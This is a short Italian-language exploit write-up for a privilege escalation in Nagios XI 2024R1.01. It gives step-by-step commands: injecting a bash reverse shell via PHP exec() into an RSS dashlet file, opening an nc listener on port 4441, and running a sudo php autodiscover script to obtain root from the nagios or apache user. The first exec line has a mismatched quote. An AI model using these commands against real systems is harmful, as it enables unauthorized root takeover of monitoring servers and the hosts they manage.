
Privilege escalation exploit per Nagios XI 2024R1.01, che consente l'accesso root completo dagli utenti NAGIOS o APACHE tramite iniezione di dashlet RSS dannosi ed esecuzione di comandi sudo.
CVE scoperto da: K. Wahab (Neo`X)
In questo esempio viene utilizzato RSS Dashlet.
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
Vai alla pagina di gestione dei "dashlets" e scarica una Dashlet:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
Modifica il file *.inc.php:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(Nota: dopo aver eseguito il comando riceverai la connessione come APACHE, usa CTRL+C per uscire e riavvia il listener più volte)
